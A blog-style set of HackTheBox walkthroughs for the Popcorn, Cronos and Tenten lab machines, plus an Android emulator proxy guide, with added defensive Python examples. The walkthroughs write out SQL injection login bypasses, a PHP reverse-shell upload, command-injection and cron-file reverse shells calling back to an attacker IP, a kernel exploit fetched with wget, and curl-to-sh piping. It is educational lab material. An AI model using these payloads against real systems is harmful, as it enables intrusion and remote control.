Popcorn HackTheBox

Hack The Box
Machine Profile
2.19.0
image

Popcorn


Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 15 Mar 2017
IP: 10.10.10.6
Walkthrough

Nmap Scan to enumerate services

$ sudo nmap -sC -Pn -sV -A -O 10.10.10.6 -o nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 13:52 EDT
Nmap scan report for 10.10.10.6
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/4%OT=22%CT=1%CU=35952%PV=Y%DS=2%DC=T%G=Y%TM=5EB056A7
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=2%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP
OS:=C9%GCD=1%ISR=C9%TI=Z%CI=Z%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54
OS:DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=16A0%W2=16A0%
OS:W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=1
OS:6A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   273.37 ms 10.10.14.1
2   273.85 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.94 seconds

Let's search for an OpenSSH 5.1p1 Debian 6ubuntu2 exploit with Kali's searchsploit:

$ searchsploit openssh

No exploit is available for OpenSSH 5.1p1 Debian 6ubuntu2.

Without wasting time, let's check what port 80 has for us.

Open your favourite browser and type 10.10.10.6.

Nothing interesting there, so let's use dirb:

$ dirb http://10.10.10.6

Well, http://10.10.10.6/torrents seems interesting.

Navigate to http://10.10.10.6/torrents

From the Torrent Hoster page above, my attack surfaces are:

  • Upload field
  • Login
  • Register

I'll test for SQL injection first, because I don't want to register.

  • Click on Login.
  • Enter the username abc' or 'a'='a'-- a and any password, for example iamnothing.
  • Click Login and see if it works. Yes, it absolutely works; don't ask how, because this is not a SQL injection class.

Moving forward, click on My Torrents and see what is there.

Click on Kali Linux under filename.

Well, it seems we can upload screenshots by clicking on Edit this torrent. The application is built in PHP, so we can upload a PHP shell or write our own exploit to get a reverse shell. I prefer to use the pentestmonkey.net shells.

You can download the PHP shell directly by clicking on shell.

You can also visit pentestmonkey to read how to use it, or follow the walkthrough below, copied from pentestmonkey.net. I hope it does not bother @pentestmonkey.

Modify the source

Edit the following lines of php-reverse-shell.php:

$ip = '10.10.14.18';  // CHANGE THIS: enter your tun0 interface IP here
$port = 8002;       // CHANGE THIS: the port your listener will use

Catching the shell

Start a TCP listener on a host machine and port that will be accessible by the web server. Use the same port here as you specified in the script (8002 in this example):

$ nc -v -n -l -p 8002

Upload and run the script

Note: we will use Burp Suite as an interception proxy to bypass any file upload restrictions.

  • Click on Edit this torrent.
  • Rename your PHP shell to exploit.php.jpg.
  • Use the command below to do so:
    $ mv php-reverse-shell.php exploit.php.jpg

  • Turn Burp Suite intercept on and, in your browser, click browse to upload your PHP shell.
  • Click submit and change Burp Suite's captured HTTP request as shown below.

  • Click forward in Burp Suite and wait for the browser to show the message below.

Wondering what's next? Go back to the dirb results: we found an upload directory, http://10.10.10.6/torrent/upload/. Check whether it contains our uploaded file.

Navigate to http://10.10.10.6/torrent/upload/. Yes, it contains our uploaded file.

I know you might be eager to click on it, but first make sure your netcat listener is running and listening on port 8002.

Click on the uploaded PHP file and see if we get a shell.

Yes, we have a shell, and it looks like this:
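Why does a file called exploit.php.jpg run as PHP, and what should the upload handler have done? The check below is an added example written for this write-up, not code from Torrent Hoster. Apache's mod_mime applies a handler for every recognised extension in a file name, so once .php is mapped to the PHP handler the double extension still executes; and the Content-Type edited in Burp proves nothing, because the client controls it. The validator therefore ignores the header, inspects the whole extension chain, checks the file's magic bytes, and stores the file under a server-chosen name. The polyglot payload in the main block is constructed for the demo.

```python
"""Why exploit.php.jpg ran as PHP on Popcorn, and what an upload check should do.

Added example for this write-up, not code from Torrent Hoster.  Apache's
mod_mime applies a handler for every recognised extension in a file name, so
once .php is mapped to the PHP handler a file called exploit.php.jpg is still
executed.  The Content-Type edited in Burp proves nothing either: the client
controls it.  The check below ignores the header, looks at the whole
extension chain, checks the file's magic bytes, and stores the file under a
server-chosen name.
"""
import os
import secrets

# Allowed image types and the magic bytes each must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Extensions that a PHP-enabled Apache may hand to the interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def extension_chain(filename):
    """All extensions after the first dot, lower-cased: 'a.PHP.jpg' -> ['php', 'jpg']."""
    base = os.path.basename(filename.replace("\\", "/"))
    return [part.lower() for part in base.split(".")[1:] if part]


def check_upload(filename, content, content_type=None):
    """Return (accepted, reason).  content_type is deliberately unused: it is attacker-supplied."""
    chain = extension_chain(filename)
    if not chain:
        return False, "no extension"
    if any(ext in EXECUTABLE for ext in chain):
        return False, "executable extension in name: " + ".".join(chain)
    last = chain[-1]
    if last not in ALLOWED:
        return False, "extension not allowed: " + last
    if not content.startswith(ALLOWED[last]):
        return False, "content does not start with " + last + " magic bytes"
    # Heuristic only: a PHP open tag inside image data means a polyglot that a
    # local file include elsewhere could still execute.
    if b"<?php" in content:
        return False, "PHP open tag inside image data"
    return True, "ok"


def stored_name(filename):
    """Server-chosen random name; the user's file name never reaches the filesystem."""
    return secrets.token_hex(16) + "." + extension_chain(filename)[-1]


if __name__ == "__main__":
    polyglot = b"\xff\xd8\xff\xe0<?php echo 'constructed demo'; ?>"   # constructed payload
    print(check_upload("exploit.php.jpg", polyglot, content_type="image/jpeg"))
    print(check_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16), stored_name("photo.jpg"))
```

Beyond the name check, the upload directory should be served with PHP execution disabled (or live outside the web root entirely), so that even a file that slips past the validator is only ever returned as bytes.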

It's not an interactive shell, so let's make it interactive (this is optional).

Run

$ python -c 'import pty; pty.spawn("/bin/bash")'

$ ls -la

$ cd /home && ls

$ cd george

$ ls

And we have our user.txt here.

$ cat user.txt

Submit your flag as fast as possible, because we are yet to pwn root and time is limited; time is money.

USER OWNED

$ cd /root

Changing directory to root says permission denied, which means we need to escalate privileges.

I won't write up all the jargon I went through while pwning root, so let's jump directly to how.

The kernel in use is Linux version 2.6.31-14-generic-pae. You can check the kernel version with the command below:

$ cat /proc/version

Navigate to https://www.exploit-db.com/exploits/15704 and download the exploit. It matches our kernel version.

After downloading, rename it in case you don't like the original exploit name. I didn't, so I renamed it to exp2.c.

Now we need to transfer the exploit to the pwned Popcorn machine.

Run python -m SimpleHTTPServer 8003 in the directory where you downloaded the exploit.

On the Popcorn machine, run cd /tmp. Remember that we need to find a directory our user has write permission to; in this case /tmp is writable, so we will download the exploit there.

$ wget 10.10.14.18:8003/exp2.c

We need to compile the program before running it.

$ gcc exp2.c -o exp3

Now run it:

$ ./exp3

cd /root and read root.txt.

Hence !!! :) :) ROOT pwned.

ROOT PWND

Note: we have exploited the kernel to get root, but the official way is something else. When I was trying to pwn root the other way, I faced a serious problem which I could not figure out how to solve. Maybe there is some change in the machine itself. You may refer to the ippsec Popcorn walkthrough in case you are eager to learn the other way too.

If you solve the machine the ippsec way after this date, I would be happy to know how. You can reach out to me at @r00trwx.

Configuring Android Studio Emulator to work with BurpSuite

Configuring Android Studio emulator to Work With Burp Suite

This is a short blog where you will learn how to intercept HTTP or HTTPS traffic from an Android Studio AVD in Burp Suite. The reason for writing it is that I myself spent hours figuring out how to intercept traffic from the Android Studio AVD in Burp Suite.

I assume that Android Studio and Burp Suite are properly installed on your system and working. Let's start by configuring Burp Suite to intercept traffic from the Android Studio AVD.

Steps:

  1. Open Burp Suite.
  2. Go to the Options tab under Proxy.
  3. Click Add to add a new proxy listener.
  4. Enter a free port of your choice; in my case I am using 8085.
  5. Choose the All interfaces radio button and click OK.
  6. Make sure that under Proxy Listeners the *:8085 listener is checked.
  7. Burp Suite is configured.

Let's configure Android Studio

  1. Open Android Studio and create an emulator using the AVD Manager, available under Tools.
  2. In my case I am creating Pixel 27 Android 8.1.
  3. Choose the release name based on your requirement.
  4. In case you get the error /dev/kvm device: permission denied, you need to grant permission on /dev/kvm.
  5. Use the command sudo chmod 777 -R /dev/kvm to assign permissions.
  6. Make sure you don't forget to give the AVD a name; I have named it target_machine.

  7. Check your system's wlan interface IP using ifconfig. In my case it is 192.168.0.108.
  8. Navigate to the directory where you installed Android Studio and its components, if any.
  9. By default it is in the user's home directory; use the command below to go there:
  10. cd ~/Android/Sdk/emulator
  11. Once you are in the emulator directory, run ./emulator -http-proxy http://192.168.0.108:8085 -avd target_machine
  12. Follow the steps shown in the image below.
  13. Configure the manual proxy configuration.

Let's see whether Burp intercepts traffic from the Android Studio AVD.

Open Burp Suite and turn Intercept on. Access any site in the phone's browser. As shown in the image below, we are able to capture the traffic in Burp Suite.

But when we forward the request in Burp Suite, the browser says the connection is not secure, because it requires the Burp CA certificate.

Cronos HackTheBox


Cronos


Cronos - Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Mar 2017
IP: 10.10.10.13
Walkthrough

Back with another retired machine on HackTheBox. This time we have Cronos, which if you break it up becomes Cron + OS.

From the name, I assume this machine must have something to do with cron jobs, but it is only an assumption.

Enumeration

As usual, we start with Nmap enumeration:

nmap -sC -sV -A 10.10.10.13

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 20:20 EDT
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.38s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.64 seconds

Services enumerated

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

22/tcp: SSH can help us with username enumeration.

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

53/tcp: domain, BIND 9, has known vulnerabilities.

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

An Apache server is running on port 80.

Starting with port 80:

  1. Navigate to http://10.10.10.13:80
  2. The Apache2 Ubuntu default page loads

  1. Apart from the Apache default page, nothing else is found.
  2. It's time to use our arsenal, that is dirb and DirBuster, to enumerate directories.
  3. Used DirBuster and found nothing.
  4. This is what we call hitting a wall.

It seems 10.10.10.13 might have a virtual hostname; let's try to find it via:

nslookup 10.10.10.13 10.10.10.13

In the command above, we look up 10.10.10.13 and use 10.10.10.13 itself as the DNS server.

From the result, it looks like the IP resolves to ns1.cronos.htb. We get our domain name: cronos.htb.

For cronos.htb to work, we need to map cronos.htb to 10.10.10.13 in our /etc/hosts file.

To do so,

sudo nano /etc/hosts

and add below line

10.10.10.13 cronos.htb

Now when we browse to cronos.htb, it will resolve to 10.10.10.13 and the server will serve the page configured for that virtual host.

When we browse to cronos.htb, we get this page:

It contains nothing besides the page shown above, so we hit a wall again.

After looking at the Nmap scan again and again, the second service, 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux), kept bugging me. Why is port 53 open and what is it used for? So I googled it.

Google gives the following answer to the question of what port 53 is used for:

The DNS uses TCP Port 53 for zone transfer, for maintaining coherence between the DNS database and the server. The UDP protocol is used when a client sends a query to the DNS server. The TCP protocol should not be used for queries as it gives a lot of information, which is useful to attackers

Also, not to forget, if you navigate to https://ns1.com/resources/bind-dns-pros-cons-and-alternatives

you will read that BIND provides tools that help manage a DNS system, including:

  • dig - allows users to run DNS queries and view server output.
  • host - converts hostnames to IP addresses.
  • nslookup - queries DNS servers for information about hosts and domains.
  • Remote Name Daemon Control (rndc) - allows administrators to control all operations of the name server via an encrypted channel

Let's initiate a zone transfer and see what we get:

dig axfr @10.10.10.13 cronos.htb

Well well well, it looks like we hit the right wall this time.
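The zone transfer worked because the server answered dig axfr from anyone. From the defender's side the same event is visible in BIND's logs, and the script below is an added example for this write-up (not part of the Cronos machine) that surfaces transfers from clients that are not the zone's legitimate secondaries. The log lines are constructed for this example in the shape of BIND's xfer-out category messages; that exact format is an assumption, so adjust AXFR_RE to your logging channel. The allowed secondary 10.10.10.20 is likewise a hypothetical value.

```python
"""Spotting an unauthorised zone transfer in BIND's logs.

Added example for this write-up, not part of the Cronos machine.  dig axfr
asks the server for the whole zone; a server that answers anyone leaks every
host name, as happened here.  The log lines below are constructed in the
shape of BIND's xfer-out category messages (an assumption about the exact
format; adjust AXFR_RE for your logging channel).  ALLOWED_SECONDARIES holds
the name servers that legitimately pull the zone (hypothetical value).
"""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

AXFR_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ "
    r"\((?P<qname>[^)]+)\): transfer of '(?P<zone>[^/']+)/IN': AXFR started"
)

# Constructed sample: one transfer from the legitimate secondary, one from an
# unknown client on the VPN range, and an ordinary A query that must be ignored.
SAMPLE_LOG = """\
26-May-2020 20:21:03.101 xfer-out: info: client 10.10.10.20#49152 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started
26-May-2020 20:21:03.150 xfer-out: info: client 10.10.10.20#49152 (cronos.htb): transfer of 'cronos.htb/IN': AXFR ended
26-May-2020 20:35:41.412 xfer-out: info: client 10.10.14.25#53211 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started
26-May-2020 20:35:41.470 xfer-out: info: client 10.10.14.25#53211 (cronos.htb): transfer of 'cronos.htb/IN': AXFR ended
26-May-2020 20:36:02.003 queries: info: client 10.10.14.25#53212 (cronos.htb): query: cronos.htb IN A +E (10.10.10.13)
"""

# Hosts allowed to transfer the zone (constructed: a hypothetical secondary).
ALLOWED_SECONDARIES = [ip_network("10.10.10.20/32")]


def axfr_events(lines):
    """Yield (client_ip, zone) for every transfer that started."""
    for line in lines:
        m = AXFR_RE.search(line)
        if m:
            yield m.group("ip"), m.group("zone")


def unauthorised_transfers(lines, allowed=ALLOWED_SECONDARIES):
    """Count transfers per (client, zone) for clients outside the allowed networks."""
    hits = Counter()
    for ip, zone in axfr_events(lines):
        if not any(ip_address(ip) in net for net in allowed):
            hits[(ip, zone)] += 1
    return dict(hits)


if __name__ == "__main__":
    for (ip, zone), n in unauthorised_transfers(SAMPLE_LOG.splitlines()).items():
        print("ALERT: %s pulled zone %s %d time(s)" % (ip, zone, n))
```

The fix on the server is an allow-transfer statement in the zone's named.conf block listing only the secondaries (or none;). After that change, the dig axfr @10.10.10.13 cronos.htb command from this write-up should come back with "Transfer failed." instead of the record list.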

I know, you must be in a hurry to browse to admin.cronos.htb, but wait: first add the subdomain to /etc/hosts:

10.10.10.13 admin.cronos.htb

Now let's browse to admin.cronos.htb.

Awesome, we have a login form. Without wasting any time, let's test the login page for boolean-based SQL injection.

Enter admin' or 'a'='a'-- a as the UserName and anything as the password. Click submit.

Yes, it is vulnerable to SQL injection and we are logged in.
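The same payload worked on the Torrent Hoster login on Popcorn and on this admin login. The example below is added for this write-up and is not either application's code: a small SQLite users table is constructed in memory and the login is written twice, once by pasting the user name into the SQL text (what both sites evidently did) and once with bound parameters. The table, the admin row and its demo password are constructed for the example; SHA-256 stands in for a real password hash.

```python
"""Why admin' or 'a'='a'-- a logs in, and the fix.

Added example covering both the Torrent Hoster login on Popcorn and the admin
login on Cronos; it is not either application's code.  A tiny SQLite users
table is constructed in memory, and the same login is written twice: once by
pasting the user name into the SQL text, once with bound parameters.
"""
import hashlib
import sqlite3

PAYLOAD = "admin' or 'a'='a'-- a"        # the user name entered in both write-ups
DEMO_PASSWORD = "not-the-real-password"  # constructed for this demo


def sha256(text):
    """Stand-in for a real password hash (use bcrypt/argon2 in production)."""
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """In-memory database with a single constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_sha256 TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", sha256(DEMO_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the quote in the payload closes the literal,
    'a'='a' makes the WHERE clause true, and -- comments out the password check."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password_sha256 = '" + sha256(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username, password):
    """Bound parameters: the whole payload is compared as one string value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_sha256 = ?",
        (username, sha256(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "iamnothing"))
    print("parameterised:", login_parameterised(db, PAYLOAD, "iamnothing"))
```

With the string-built query the statement that reaches the database is SELECT username FROM users WHERE username = 'admin' or 'a'='a' with everything after -- discarded, which is why any password works; with placeholders the driver never lets the quote change the query's grammar.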

The form offers two services, traceroute and Ping. Both run OS commands, so we can get a reverse shell easily if the user input is not properly sanitized.

Start a listener in your terminal:

nc -nlvp 6001

Change the service from traceroute to Ping and enter the value as:

127.0.0.1; php -r '$sock=fsockopen("10.10.14.25",6001);exec("/bin/sh -i <&3 >&3 2>&3");'

Click Execute

And we have our shell.

The current user is www-data.
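Why did the Ping field run a second command? The example below is added for this write-up and is not the admin panel's own code. It assumes the vulnerable handler built one string, 'ping -c 1 ' plus the form value, and handed it to /bin/sh, so the ';' ended ping and started php. The hardened version accepts only an IP literal and passes an argv list to the process without a shell. The shell-splitting helper only tokenises; nothing in the block executes the page's payload.

```python
"""Why 127.0.0.1; php -r '...' ran on Cronos, and the fix.

Added example, not the admin panel's own code.  The vulnerable handler is
assumed to build one string, 'ping -c 1 ' plus the form value, and hand it to
/bin/sh; the ';' then ends ping and starts a second command.  The hardened
version accepts only an IP literal and passes an argv list to the process, so
no shell parses the value at all.
"""
import ipaddress
import shlex
import subprocess

# The Ping field value from the write-up.
PAGE_PAYLOAD = ("127.0.0.1; php -r '$sock=fsockopen(\"10.10.14.25\",6001);"
                "exec(\"/bin/sh -i <&3 >&3 2>&3\");'")


def vulnerable_shell_command(host):
    """What a handler like shell_exec('ping -c 1 ' . $host) passes to /bin/sh."""
    return "ping -c 1 " + host


def commands_the_shell_would_run(cmdline):
    """Split a command line at ';' the way a POSIX shell would, honouring quotes."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(host):
    """Validate the value as an IP address and return argv for subprocess (no shell)."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % host) from None
    return ["ping", "-c", "1", str(addr)]


def run_ping(host, timeout=10):
    """Run the validated command without a shell; raises ValueError on bad input."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    for argv in commands_the_shell_would_run(vulnerable_shell_command(PAGE_PAYLOAD)):
        print("shell would run:", argv[0], "with", len(argv) - 1, "argument(s)")
    print("hardened:", safe_ping_argv("127.0.0.1"))
    try:
        safe_ping_argv(PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened rejected:", exc)
```

Two things matter in the hardened path: the value is parsed as an IP address (a host name field would need an equally strict allow-list), and the argv list goes to subprocess.run without shell=True, so separators, quotes and redirections in the input are just characters in one argument.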

USER OWNED

Let's find our first flag to complete the ritual.

cd /home && ls

The user directory is noulis.

cd noulis && ls

and to read the flag:

cat user.txt

Navigating to /root is denied, so we need to escalate privileges.

Try running sudo -l. It gives nothing.

When sudo -l gives me nothing, the next thing I do is run linpeas to enumerate everything possible on the box.

If you are new to linpeas, follow the steps below to use it.

On your base machine (in my case Kali Linux), run the commands below:

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git 

Now navigate to privilege-escalation-awesome-scripts-suite:

cd privilege-escalation-awesome-scripts-suite  && cd linPEAS 

Now run a Python HTTP server to serve the linpeas file to the Cronos machine, or to whichever machine you just got a reverse shell on:

python -m SimpleHTTPServer 6002 

Now, in the Cronos shell (the reverse shell you just got), run:

curl 10.10.14.25:6002/linpeas.sh | sh   

Note: 10.10.14.25 is my tun0 IP.

The scan returns a lot of juicy information, but we are interested in something that can get us root.

If you remember, at the start I mentioned that the machine name is Cron+OS and that it might have something to do with cron jobs. I think I was right.

The linpeas result contains:

You can also read the crontab with:

cat /etc/crontab  

If you are new to cron jobs and want to learn about them, follow this blog. It explains cron jobs very well.

Link: Cron Jobs with php

Also, if you are new to Laravel and wondering what artisan is, follow this documentation.

Link: Laravel Artisan

In short, Artisan is the command-line interface included with Laravel. It provides a number of helpful commands that can assist you while you build your application.

The artisan file is run by root, as shown in the image above. If user www-data has write permission on the artisan file, then we can get root. Let's check by navigating to its location:

cd /var/www/laravel && ls -la

Yes, the user has write permission.
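The check just done by hand (a root cron job whose script a low-privilege user can overwrite) is worth automating over the whole crontab. The script below is an added example for this write-up, not part of the Cronos machine or of linpeas: it parses each job line, pulls the absolute paths out of the command, and flags root jobs whose target is owned by someone other than the trusted uid or carries a group/other write bit. The crontab text is constructed for the example.

```python
"""Finding root cron jobs whose target a low-privilege user can overwrite.

Added example, not part of the Cronos machine or linpeas.  The write-up shows
that artisan is run from root's crontab and is writable by www-data; this
script generalises that check over a whole crontab: parse each job, pull the
absolute paths out of its command, and flag any that are not owned by the
trusted uid or are group/world writable.  The crontab text is constructed for
this example.
"""
import os
import re
import stat

# "<5 time fields or @keyword> <user> <command>" as in /etc/crontab and /etc/cron.d.
CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+|@\w+)\s+(\S+)\s+(.+)$")

SAMPLE_CRONTAB = """\
# /etc/crontab: constructed sample for this example
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""


def parse_crontab(text):
    """Return [(user, command)] for every job line, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(2), m.group(3)))
    return jobs


def paths_in(command):
    """Absolute paths mentioned in a command string (a simple token scan)."""
    return [tok for tok in re.split(r"[\s;&|]+", command) if tok.startswith("/")]


def writable_by_others(path, trusted_uid=0):
    """True if a regular file or directory is owned by someone other than
    trusted_uid, or carries the group or other write bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
        return False  # devices such as /dev/null are world-writable by design
    if st.st_uid != trusted_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_root_jobs(text, trusted_uid=0):
    """[(command, path)] for root jobs that touch a path others can modify."""
    findings = []
    for user, command in parse_crontab(text):
        if user != "root":
            continue
        for path in paths_in(command):
            if writable_by_others(path, trusted_uid):
                findings.append((command, path))
    return findings


if __name__ == "__main__":
    for command, path in risky_root_jobs(SAMPLE_CRONTAB):
        print("root runs %r but %s is modifiable by others" % (command, path))
```

Run against the real /etc/crontab and the files in /etc/cron.d, this is the defender's version of the ls -la above; the remediation for a hit like artisan is root ownership with mode 0755 or tighter, and the same applies to the directory containing the script.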

Let's edit the file by running the command below:

echo '<?php $sock=fsockopen("10.10.14.25",6005);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan

The above command replaces the contents of the artisan file with our PHP reverse shell.

Now run a netcat listener to check if we get root:

nc -nlvp 6005

Wait for the cron job to run and give us a shell.

Hence the r00t is pwned.

ROOT PWND

To complete the ritual, let's find our root.txt:

ls

then

cat root.txt

Happy Pwning!!!!!

Tenten HackTheBox


Tenten


Tenten - Description
OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Mar 2017
IP: 10.10.10.10
Walkthrough

Enumeration

As usual, we start with an Nmap scan to enumerate the services running on the target:

nmap -sC -sV -o tenten 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 15:03 EDT
Nmap scan report for 10.10.10.10
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal &#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.23 seconds

We have two ports open, and the services running are:

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

It's time to use my pentesting skills, so let's open the web service running on port 80.

It is a WordPress website.

Before using my powers like dirbuster/gobuster or wpscan to dig deep into this WordPress application, let's do a user-driven workflow to understand what this application actually does.

In WordPress, most of the time the posts contain the author name. This is because, from what I know, WordPress started with the idea of blogging, and blogs do have author names. So my first step would be to check any posts available.

Well, on the homepage we only have the default Hello World post.

Let's read what the Hello World post talks about. We do this by clicking on the post title, or you can request http://10.10.10.10/index.php/2017/04/12/hello-world/.

I got what I wanted. Wondering what?

A user on the application named Takis.

Another way in WordPress to find the users on the application is to request the URL http://10.10.10.10/index.php/wp-json/wp/v2/users

If you want to enumerate more, please do, but I am happy with takis.

It is always good practice to check the official theme/framework used, on its official website. As I follow good practices, I will check the original theme. See the picture below.

If you notice, it has three menus, which I have highlighted. Our Tenten web app also has one more menu, named JobsListing.

What are you waiting for? Click on that menu and check what it has for us.

Ohh, it has a job listed for Pen Tester. Thanks to Tenten, I was also looking for a job. I'll apply here.

Click Apply Now

It has an id-driven URL, http://10.10.10.10/index.php/jobs/apply/8/, a form with many user-controlled input fields, and our favourite: an upload field.

Attack surfaces

  • http://10.10.10.10/index.php/jobs/apply/8/; you can think of it as http://10.10.10.10/index.php/jobs/apply=8. If you do web assessments, id-driven pages should always catch your eye. My next thought would be to change the id from 8 to some other value and check what happens.

I changed my id value to 13, and look what I got:

http://10.10.10.10/index.php/jobs/apply/13/

  • Form with input fields
  • Resume upload feature. I know you are feeling happy looking at this feature and that the machine is as good as pwned, but let me tell you, this upload feature won't help you much in pwning the machine.

Coming to our first attack surface:

Open Burp Suite and intercept the request.

Make a request to the URL http://10.10.10.10/index.php/jobs/apply/8/

